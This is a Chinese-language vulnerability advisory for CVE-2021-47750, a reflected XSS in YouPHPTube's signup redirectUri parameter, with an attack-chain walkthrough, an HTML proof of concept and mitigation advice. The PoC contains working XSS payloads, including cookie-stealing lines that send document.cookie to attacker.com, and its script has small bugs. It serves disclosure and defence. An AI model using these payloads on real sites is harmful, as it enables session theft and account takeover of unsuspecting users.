CVE-2021-47750: YouPHPTube signup页面redirectUri参数XSS漏洞

漏洞信息

漏洞编号

CVE-2021-47750

漏洞类型

XSS跨站脚本攻击

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

YouPHPTube

漏洞概述

CVE-2021-47750是YouPHPTube视频分享平台中发现的一个中等严重性跨站脚本（XSS）漏洞。该漏洞存在于YouPHPTube 7.8及以下版本的注册（signup）页面中，攻击者可以通过redirectUri参数注入恶意JavaScript脚本。由于该参数在处理用户输入时未进行充分的输入验证和输出编码，攻击者可以在URL中嵌入特制的脚本标签，当其他用户访问包含恶意载荷的注册链接时，这些脚本将在受害者浏览器上下文中执行。成功利用此漏洞的攻击者可以窃取用户的会话cookie、劫持用户账户、执行钓鱼攻击或传播恶意内容。由于该漏洞需要用户交互（点击特制链接），攻击复杂度较低，但潜在危害包括用户凭证泄露、账户接管以及在受害者浏览器中执行任意操作。

技术细节

该漏洞的根本原因在于YouPHPTube的signup.php页面在处理redirectUri参数时缺乏适当的输入验证和输出编码。当用户访问注册页面时，如果URL中包含redirectUri参数，应用程序会将该参数值直接用于页面输出，而未进行HTML实体编码或安全过滤。攻击者可以构造如下恶意URL：signup.php?redirectUri=javascript:alert(document.cookie)或使用script标签注入。由于浏览器会将URL参数中的特殊字符进行解码，注入的脚本标签会被解析执行，从而在受害者浏览器中运行任意JavaScript代码。此类反射型XSS漏洞虽然需要用户点击特制链接才能触发，但攻击者通常通过社会工程学手段（如钓鱼邮件）诱导用户点击。攻击成功后，攻击者可以获取用户的认证令牌、会话ID或其他敏感信息，进而实现账户劫持或横向移动。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用YouPHPTube <= 7.8版本，并发现signup.php页面存在未过滤的redirectUri参数

STEP 2

步骤2: 载荷构造

攻击者构造包含XSS payload的恶意URL，使用<script>标签或事件处理器（如onerror、onload）注入JavaScript代码

STEP 3

步骤3: 社会工程

攻击者通过钓鱼邮件、社交媒体消息或其他渠道向目标用户发送包含恶意链接的消息，诱导用户点击

STEP 4

步骤4: 漏洞触发

受害者点击恶意链接访问signup.php页面，服务器将未过滤的redirectUri参数值返回给用户浏览器

STEP 5

步骤5: 脚本执行

受害者浏览器解析HTML时执行注入的JavaScript代码，攻击者可在受害者上下文中执行任意操作

STEP 6

步骤6: 数据窃取

攻击者通过JavaScript获取受害者的Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7: 账户劫持

攻击者使用窃取的凭证登录受害者账户，进行未授权操作或窃取更多敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2021-47750 PoC - YouPHPTube XSS via redirectUri parameter -->
<!-- This PoC demonstrates the XSS vulnerability in YouPHPTube signup page -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2021-47750 PoC</title>
</head>
<body>
    <h1>CVE-2021-47750: YouPHPTube XSS Vulnerability PoC</h1>
    <p>Target: YouPHPTube <= 7.8</p>
    
    <h2>Malicious Signup URL:</h2>
    <textarea rows="3" cols="80" readonly>
http://target-site.com/signup.php?redirectUri=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cspan%20x=%22
    </textarea>
    
    <h2>Alternative Payload - Cookie Stealer:</h2>
    <textarea rows="2" cols="80" readonly>
signup.php?redirectUri=%3Cimg%20src=x%20onerror=%22fetch%28%27https://attacker.com/steal?c=%27+document.cookie%29%22%3E
    </textarea>
    
    <h2>Attack Scenario:</h2>
    <ol>
        <li>Attacker crafts a malicious URL with XSS payload in redirectUri parameter</li>
        <li>Attacker sends the URL to victim via email, social media, or other channels</li>
        <li>Victim clicks the link and visits the signup page</li>
        <li>XSS payload executes in victim's browser, stealing cookies or performing actions</li>
    </ol>
    
    <script>
        // Simulate the vulnerable URL construction
        const baseUrl = window.location.origin + '/signup.php';
        const maliciousPayload = '\"><script>alert("XSS");document.location="https://attacker.com/redirect?c=' + encodeURIComponent(document.cookie) + '"<\/script>\<';
        const maliciousUrl = baseUrl + '?redirectUri=' + encodeURIComponent(maliciousPayload);
        
        console.log('Malicious URL:', maliciousUrl);
        document.getElementById('generated-url').textContent = maliciousUrl;
    </script>
</body>
</html>

影响范围

YouPHPTube <= 7.8

防御指南

临时缓解措施

在等待官方安全更新期间，可采取以下临时缓解措施：1) 在Web服务器层面（如Nginx/Apache配置）对signup.php页面添加URL参数过滤规则，移除或编码特殊字符；2) 禁用或限制redirectUri参数的功能，强制跳转到固定页面；3) 部署Web应用防火墙规则识别常见的XSS攻击模式；4) 通过安全意识培训提醒用户不要点击可疑链接；5) 启用服务器端日志监控，及时发现异常访问模式。